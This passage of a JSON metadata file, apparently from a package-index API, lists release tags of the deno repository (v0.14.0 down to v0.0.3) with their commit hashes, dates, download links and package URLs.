ub.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3",